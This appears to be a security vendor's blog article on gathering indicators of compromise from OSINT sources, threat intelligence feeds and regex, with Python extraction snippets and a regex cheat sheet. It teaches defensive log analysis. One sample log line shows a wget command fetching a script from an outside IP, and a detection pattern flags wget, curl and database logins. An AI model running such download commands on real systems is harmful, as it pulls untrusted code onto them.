05 Jul 2023

Advanced IOCs Collection with OSINT and Threat Intelligence Feeds

Mathieu Gaucheler

Moving from Vulnerability to Vigilance

Organizations constantly wage battles against malicious actors who seek to exploit vulnerabilities and infiltrate their digital defenses at any given time. As attacks grow in complexity, it’s imperative to keep your guard up against potential threats.

Fortunately, there are more and more methods for gathering information about attacks and attackers. By drawing on open source information (OSIF) and threat intelligence feeds, you can incorporate cyber threat intelligence into your defense strategies. This allows you to identify specific indicators of compromise (IOCs) within your systems during incident response and to better understand the targets of an attack.

In this article, we will cover the following topics:

  1. The use of IOCs in open source intelligence (OSINT) investigations
  2. Reliable sources for tracking IOCs
  3. Tips on using regular expression (regex) to identify patterns indicating a threat actor
  4. The role of threat intelligence feeds in keeping your teams informed about new threats


Understand the Scope and Impact of an Attack with IOCs

IOCs are artifacts or clues left behind after a cyberattack that you can observe on your system to determine if your system has been compromised. IOCs come in different forms, such as IP addresses, file hashes, domain names, URLs, and more.

Examples of IOCs

A typical application of IOCs during incident response arises following a cyberattack. By parsing through logs and extracting IOCs, you can reconstruct the incident’s sequence of events, solving the puzzle of what happened.

IOCs help track threat actors because some can be linked to previous attacks or campaigns. Suppose a particular attack or campaign has already been attributed to a specific threat actor. In that case, it is possible that the same threat actor might be responsible for the IOCs you’re investigating.

IOCs are Valuable for OSINT Investigations

IOCs can be valuable for OSINT investigations as they provide specific clues related to malicious activities. They can lead us to more contextual information which helps us gain a deeper understanding of potential threats.

Incorporating IOCs into OSINT analysis can therefore enrich your data, improve threat detection, contextualize threats, and enable proactive defense.

How IOCs fit into OSINT investigations

If you have observed specific IOCs on your system and initiated the incident response process, you might want to delve deeper into a particular IOC to understand who is targeting you. This is essentially a part of Cyber Threat Intelligence (CTI).

Identify Traces of Threat Actors from Attack Associations and Shareable IOCs

When you’re trying to identify the culprits behind cyberattacks, one of the methods you can apply is searching for IOCs that have been connected to previous incidents. However, you also want to keep in mind how closely the IOCs are linked to past incidents, as not all connections are equally strong or reliable.

Example:

The same IP address used in two attacks during the same timeframe is a strong indicator that both were carried out by the same threat actor, unless the IP address belongs to a Tor exit node or to a content delivery network (CDN). In those cases, the overlap could be merely coincidental.

Likewise, if two different instances of malware download a payload from a widely accessible website like Dropbox or Discord, it’s highly unlikely that these attacks are associated.
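The idea of weighing how strongly two incidents are linked can be sketched in a few lines of Python. This is only an illustration: the IOC values, the incident sets, and the SHARED_INFRASTRUCTURE list are all hypothetical, and a real list of Tor exit nodes, CDNs, and file-sharing services would need to be maintained separately.

```python
# Hypothetical IOC sets from two incidents (illustrative values only).
incident_a = {"203.0.113.10", "cdn.discordapp.com", "evil-updates.example"}
incident_b = {"203.0.113.10", "cdn.discordapp.com", "198.51.100.7"}

# Assumption: a locally maintained list of shared services, Tor exit nodes,
# and CDN hosts whose reuse says little about who is behind an attack.
SHARED_INFRASTRUCTURE = {"cdn.discordapp.com", "dropbox.com"}


def meaningful_overlap(a: set[str], b: set[str], shared: set[str]) -> set[str]:
    """Return IOCs seen in both incidents, ignoring shared infrastructure."""
    return (a & b) - shared


overlap = meaningful_overlap(incident_a, incident_b, SHARED_INFRASTRUCTURE)
print(sorted(overlap))
```

Only the overlapping IP address remains as a candidate link here; the Discord CDN host is dropped because many unrelated actors use it.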


IOCs are primarily reactive in nature: You first notice something suspicious, and then search for IOCs to understand what has happened to your system. However, they can also be employed proactively to generate cyber threat intelligence.

Example:

As we read through this report by Talos, we can take note of various IOCs to study them later to get actionable intelligence. One simple yet effective step to take is to block the IP addresses mentioned in this article.


Another important point to consider is that threat actors often deploy infrastructure that can be shared across various devices to carry out an attack. The identifiers of this infrastructure later become IOCs. In order to track threat actors, you need to look into these types of IOCs.

Example:

A less effective indicator to track threat actors is a hash, as it is used to identify one file. Any threat actor can easily generate multiple variations of the same malware with slight changes, resulting in entirely different hashes (this holds for all common hashing algorithms, such as MD5, SHA1, or SHA256).

On the other hand, indicators like a domain, a domain pattern, or an SSL configuration are much more valuable. They require more effort for threat actors to create, so they are more likely to be reused. By identifying and monitoring these indicators, you have a better chance of discovering new components, such as related malware or infrastructure, that are associated with the threat actors.
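The point about hashes in this example can be illustrated with Python's standard hashlib module. The two payloads below are made-up byte strings that differ in a single character; they stand in for two builds of the same malware.

```python
import hashlib

# Two hypothetical payloads that differ by a single byte.
original = b"MZ\x90\x00 example payload v1"
variant = b"MZ\x90\x00 example payload v2"

digest_original = hashlib.sha256(original).hexdigest()
digest_variant = hashlib.sha256(variant).hexdigest()

print(digest_original)
print(digest_variant)
print("same hash:", digest_original == digest_variant)
```

The two digests share no useful similarity, which is why a hash on its own identifies one file rather than a family of related files.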


Attribute IOCs to Threat Actors through Malware and Infrastructure

It’s critical to keep in mind that attributing cyberattacks to specific threat actors is a difficult task and rarely achieves 100% accuracy.

There are various reasons for this, including the reuse of infrastructure or software by different actors, the potential for shared members among threat groups, and the deliberate use of false flags to mislead investigators. Altogether, they render the attribution process a very imprecise and flawed science.

However, looking beyond attribution, the study of IOCs left behind can still provide us with valuable insights into similar malware and the infrastructure employed by threat actors:

  • If we come across malware on our infrastructure, we can examine its communication patterns by analyzing data from well-known sandbox websites like JoeSandbox or VirusTotal.
  • If the malware is communicating with a specific IP address, we can gather information about the behavior of that IP address by consulting providers like GreyNoise, or we can refer back to VirusTotal or OTX AlienVault.
  • If the identified IP address has been used to download other malware, we can further investigate its presence and activity within our infrastructure.

Use Public Sources to Keep Track of IOCs

In addition to keeping a close eye on your system for IOCs, you can tap into open-source data sources to enhance your IOCs collection. These sources include public repositories, online forums, and social media platforms, among others.

Public Sources for Keeping Track of IOCs

Here are some of our recommendations:

Another idea is checking specialized websites, such as Talos Intelligence. While these websites are not threat intelligence feeds, you can still obtain the analysis of a particular threat actor or malware from their research.

There are also communities where IOCs are shared, such as MISP or OTX AlienVault. While these communities may not strictly fall under the umbrella of open source intelligence (OSINT), they can still provide valuable IOCs for your collection.

Online forums can also be a potential source of IOCs, although to a lesser extent. It is rare for a threat actor to post a VirusTotal link to their malware, which would include the hash of the malware in the link. This is considered a bad practice among threat actors and is therefore not commonly seen.

Use Regex to Analyze Unstructured Data and Spot Patterns

Regular expressions (regex) may require more hands-on work, but they prove particularly useful in the context of IOCs and OSINT.

A regex is a string of characters that enables you to define a specific pattern. This allows you to search for and/or replace occurrences of this pattern within a given text. For example, with a simple regex, you can extract a list of IP addresses mentioned in a random log file, regardless of its length.
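As a minimal sketch of that IP address example, the following Python snippet uses the standard re module. The log lines are invented for illustration, and the pattern is deliberately simple: it does not check that each number is 255 or lower.

```python
import re

# Deliberately simple pattern: four dot-separated groups of 1-3 digits.
# It does not check that each group is <= 255.
IPV4_PATTERN = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Hypothetical log lines for illustration.
log_text = """\
Jan 10 03:12:01 host sshd[811]: Failed password for root from 198.51.100.23 port 4711
Jan 10 03:12:09 host sshd[811]: Failed password for admin from 198.51.100.23 port 4712
Jan 10 03:15:44 host nginx: 203.0.113.5 - - "GET /login HTTP/1.1" 200
"""

# dict.fromkeys removes duplicates while keeping first-seen order.
unique_ips = list(dict.fromkeys(IPV4_PATTERN.findall(log_text)))
print(unique_ips)
```

The same few lines work unchanged whether the log has three lines or three million.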

Regexes have the following advantages:

  • Efficiency: If you were to run a simple regex on the entire Bible, which comprises approximately 31,000 lines (considered relatively small compared to some log files), the results would be instantaneous.
  • Wide adoption: Regex has been around since the 1950s. There is extensive documentation, a variety of development tools, and a supportive community to help answer any questions. Also, many tools and platforms support the use of regex, enabling you to apply your knowledge in various contexts.
  • Easy to learn, hard to master: Basic regex searches, such as looking for any IP address within a given netblock, can be learned in about an hour. You can go much further and do some very complex and specific searches depending on your needs. This, however, requires more time and patience.
  • IOCs validation: Regex searches are like detectives who check whether the right pieces fit together. IOCs have specific formats and patterns, just like fingerprints. You can use regex searches to validate IOCs and see if they match the expected patterns. This can help maintain the accuracy of collected indicators, reduce errors in threat detection, and ensure you don’t miss potential threats or raise false alarms.
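The validation idea from the last point could look like the sketch below. The function names are our own. For SHA256 hashes a regex is enough; for IPv4 addresses the example swaps in Python's standard ipaddress module instead of a regex, because it also checks that every octet is in the range 0 to 255.

```python
import ipaddress
import re

SHA256_PATTERN = re.compile(r"[A-Fa-f0-9]{64}")


def is_valid_ipv4(candidate: str) -> bool:
    """True if the string parses as an IPv4 address (each octet 0-255)."""
    try:
        ipaddress.IPv4Address(candidate)
        return True
    except ValueError:
        return False


def is_valid_sha256(candidate: str) -> bool:
    """True if the whole string is exactly 64 hexadecimal characters."""
    return SHA256_PATTERN.fullmatch(candidate) is not None


print(is_valid_ipv4("8.8.8.8"), is_valid_ipv4("999.1.1.1"))
print(is_valid_sha256("a" * 64), is_valid_sha256("a" * 63))
```

Using fullmatch rather than search matters here: it rejects strings that merely contain a valid-looking indicator somewhere inside them.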

Key Considerations for Using Regex

Regexes can be quite complex, so it’s wise to test them before running them on large files. Websites like regex101 can help you test your regex with sample text to ensure it works as expected.

When conducting a regex search, it’s best to start with a broader search pattern and then refine it gradually so that you do not miss any important information.

Example:

Before May 3rd, 2023, the string “malware.zip” was almost certainly a filename because, at that time, “.zip” domains could not yet be registered by the public. A generic regex for domains that does not check for valid TLDs would nevertheless identify “malware.zip” as a domain, resulting in a false positive.

To avoid this, a skilled analyst would design a regex that accepts only valid TLDs when detecting domains. However, on May 3rd, 2023, Google started selling domain names under the “.zip” TLD. From that date on, any regex whose TLD list was not updated accordingly would miss real domains using this TLD, resulting in false negatives.


This example illustrates just one of the many situations where you have to choose between using:

  • A more generic regex, which identifies more results but may include false positives.
  • A more restrictive regex that minimizes the number of false positives. However, in doing so, it may miss some valid results.

It is generally easier to identify something in your results that shouldn’t be there, rather than noticing something that should be there but is missing.
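The trade-off can be made concrete with two small Python patterns. Both are simplified sketches rather than production-grade domain matchers, and KNOWN_TLDS is a tiny hand-picked list used purely for illustration; a real list would have to follow the official TLD registry.

```python
import re

# Generic: any dotted name ending in 2+ letters counts as a domain.
GENERIC_DOMAIN = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)

# Restrictive: only accept a hand-picked set of TLDs (assumption: a tiny
# illustrative list, not a complete or current one).
KNOWN_TLDS = ("com", "net", "org")
RESTRICTIVE_DOMAIN = re.compile(
    r"\b(?:[a-z0-9-]+\.)+(?:" + "|".join(KNOWN_TLDS) + r")\b", re.IGNORECASE
)

text = "Dropper fetched malware.zip from files.example.com and update.example.zip"

generic_hits = GENERIC_DOMAIN.findall(text)
restrictive_hits = RESTRICTIVE_DOMAIN.findall(text)
print(generic_hits)
print(restrictive_hits)
```

The generic pattern reports the filename as a domain, which is easy to spot and discard by eye. The restrictive pattern silently drops the domain under the “.zip” TLD, and nothing in its output hints that anything is missing.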

There are two things that could be particularly interesting to look for when searching through log files:

  • Login attempts into databases or other critical tools on the machine (e.g., “mysql -u”)
  • Tools that could potentially be used for file download or upload purposes (e.g., wget or curl).
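A search for both kinds of activity might look like the following sketch. The log lines and their format are hypothetical; adapt the pattern to whatever your shell history or audit logs actually contain.

```python
import re

# Matches "mysql -u" (a database login) or wget/curl as standalone words.
SUSPICIOUS_COMMAND = re.compile(r"\bmysql\s+-u\b|\b(?:wget|curl)\b")

# Hypothetical shell-history or audit-log lines.
log_lines = [
    "2023-07-01 10:02:11 user=www-data cmd='ls -la /var/www'",
    "2023-07-01 10:02:40 user=www-data cmd='wget http://203.0.113.5/a.sh'",
    "2023-07-01 10:03:02 user=www-data cmd='mysql -u root -p'",
    "2023-07-01 10:04:15 user=backup cmd='tar czf /tmp/b.tgz /etc'",
]

hits = [line for line in log_lines if SUSPICIOUS_COMMAND.search(line)]
for line in hits:
    print(line)
```

A match is only a starting point for review, since administrators use these tools legitimately too.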

If you would like to experiment with some regex patterns, take a look at our regex cheat sheet for automatically extracting data from reports:

CVEs

CVE-\d{4}-\d{4,}

Common hashes (MD5, SHA1 and SHA256)

[A-Fa-f0-9]{64}|[a-fA-F0-9]{40}|[a-fA-F0-9]{32}

URL even when defanged (ex: hxxps://google[.]com)

(?:h..ps?|f.p)://(?:www(?:\.|\[\.\])|(?!www))[a-zA-Z0-9][a-zA-Z0-9-]+[a-zA-Z0-9](?:\.|\[\.\])[^\s]{2,}|www(?:\.|\[\.\])[a-zA-Z0-9][a-zA-Z0-9-]+[a-zA-Z0-9](?:\.|\[\.\])[^\s]{2,}|https?://(?:www(?:\.|\[\.\])|(?!www))[a-zA-Z0-9]+(?:\.|\[\.\])[^\s]{2,}|www(?:\.|\[\.\])[a-zA-Z0-9]+(?:\.|\[\.\])[^\s]{2,}

IPv4 even when defanged (ex: 8[.]8[.]8[.]8)

\b\d{1,3}\[?\.\]?\d{1,3}\[?\.\]?\d{1,3}\[?\.\]?\d{1,3}(:\d+)?\b

IPv6

[0-9a-fA-F]{1,4}(?::[0-9a-fA-F]{1,4}){7}|(?:(?:[0-9A-Fa-f]{1,4}(?::[0-9A-Fa-f]{1,4}){0,5})?)::(?:(?:[0-9A-Fa-f]{1,4}(?::[0-9A-Fa-f]{1,4}){0,5})?)

BTC address

(?:[13]|bc1)[a-zA-HJ-NP-Z0-9]{26,62}
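To show how a few of these patterns might be combined, here is a small Python sketch. The patterns are adapted from the cheat sheet rather than copied verbatim: the CVE pattern requires at least four digits in the sequence number, the hash pattern adds word boundaries, and the IPv4 pattern escapes the optional defang brackets explicitly. The function names and the report text are hypothetical.

```python
import re

# Patterns adapted from the cheat sheet above (see the notes in the lead-in).
PATTERNS = {
    "cve": re.compile(r"CVE-\d{4}-\d{4,}"),
    "hash": re.compile(r"\b(?:[A-Fa-f0-9]{64}|[A-Fa-f0-9]{40}|[A-Fa-f0-9]{32})\b"),
    "ipv4": re.compile(r"\b\d{1,3}(?:\[?\.\]?\d{1,3}){3}\b"),
}


def refang(value: str) -> str:
    """Turn a defanged indicator such as 8[.]8[.]8[.]8 back into 8.8.8.8."""
    return value.replace("[.]", ".")


def extract_iocs(report: str) -> dict[str, list[str]]:
    """Return every match per IOC type, refanged, in order of appearance."""
    return {
        name: [refang(m.group(0)) for m in pattern.finditer(report)]
        for name, pattern in PATTERNS.items()
    }


# Hypothetical report excerpt.
report = (
    "The actor exploited CVE-2021-44228 and contacted 203[.]0[.]113[.]5. "
    "Dropped file MD5: d41d8cd98f00b204e9800998ecf8427e."
)
iocs = extract_iocs(report)
print(iocs)
```

Keeping the patterns in one dictionary makes it easy to add the URL, IPv6, or BTC patterns later without touching the extraction logic.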


Threat Intelligence Feeds Put IOCs into Context

Regex searches have a limitation in that they do not consider the surrounding context and focus solely on predefined patterns and structures. However, this limitation does not apply to threat intelligence feeds.

Intelligence is not the same as a collection of unorganized IOCs. These IOCs should have associated context and answer questions like:

  • When were they observed?
  • Who is the threat actor they are linked to?
  • What malware are they associated with?

This doesn’t mean that all the information is always available, but threat intelligence feeds provide as much contextual information about IOCs as is available.
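One way to picture an IOC with its context is as a small record whose optional fields answer the questions above. The class, its field names, and the sample records below are hypothetical and do not follow the schema of any particular feed.

```python
from dataclasses import dataclass
from datetime import date
from typing import Optional


@dataclass(frozen=True)
class EnrichedIOC:
    """An indicator plus the context a feed might attach to it.

    Field names are hypothetical and do not follow any specific feed schema.
    """
    value: str
    ioc_type: str
    first_seen: Optional[date] = None      # When was it observed?
    threat_actor: Optional[str] = None     # Who is it linked to?
    malware_family: Optional[str] = None   # What malware is it associated with?


# Illustrative records; the actor and malware names are made up.
feed = [
    EnrichedIOC("203.0.113.5", "ipv4", date(2023, 5, 2), "ExampleGroup", "ExampleLoader"),
    EnrichedIOC("bad.example", "domain", date(2023, 6, 9), "ExampleGroup", None),
    EnrichedIOC("198.51.100.7", "ipv4"),  # no context available yet
]


def by_actor(records: list[EnrichedIOC], actor: str) -> list[EnrichedIOC]:
    """Return all indicators attributed to the given threat actor."""
    return [r for r in records if r.threat_actor == actor]


for ioc in by_actor(feed, "ExampleGroup"):
    print(ioc.value, ioc.first_seen, ioc.malware_family)
```

The optional fields reflect the caveat above: some indicators arrive with full context, others with none at all.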

We can think of it as a large encyclopedia that analysts can turn to when they’re trying to make sense of unusual discoveries in their systems.

Therefore, threat intelligence feeds are invaluable for threat analysts.

Here are a few examples of threat intelligence feeds with diverse sets of data sources commonly used in the industry:

One thing worth mentioning: although threat intelligence feeds are useful for detecting and responding to security incidents, they are a tool that makes the analyst’s work easier. They do not aim to serve as an automated solution in the way that Endpoint Detection and Response (EDR) platforms do.

In any case, the data provided by threat intelligence feeds are structured and designed to be easily queried, meaning that the information obtained is already organized and tailored for ingestion.

Advancing Your Security Measures to a Proactive Level

To sum up, there are reliable methods for collecting and comprehending IOCs, such as:

  1. Open source intelligence (OSINT)
  2. Threat intelligence feeds
  3. Regular expressions (regex)

When used consistently and properly, these resources will help you stay ahead of adversaries and maintain a proactive security stance.

If you’re interested in exploring similar topics, check out our article on the Top 13 Threat Intelligence Providers and watch the recorded webinar where our experts explore the mapping of advanced APTs’ threat landscape using Maltego and RiskIQ PassiveTotal.

Stay connected with us on Twitter and LinkedIn, and don’t forget to subscribe to our newsletter for regular updates.

Happy investigating!

About the Author

Mathieu Gaucheler

Mathieu Gaucheler is a subject matter expert at Maltego. His responsibilities include research-driven content development for blog posts, webinars, and talks. He started working in cybersecurity in Barcelona, focusing on malware analysis and sandbox development. He has previously presented his research at BotConf and RSA APJ.
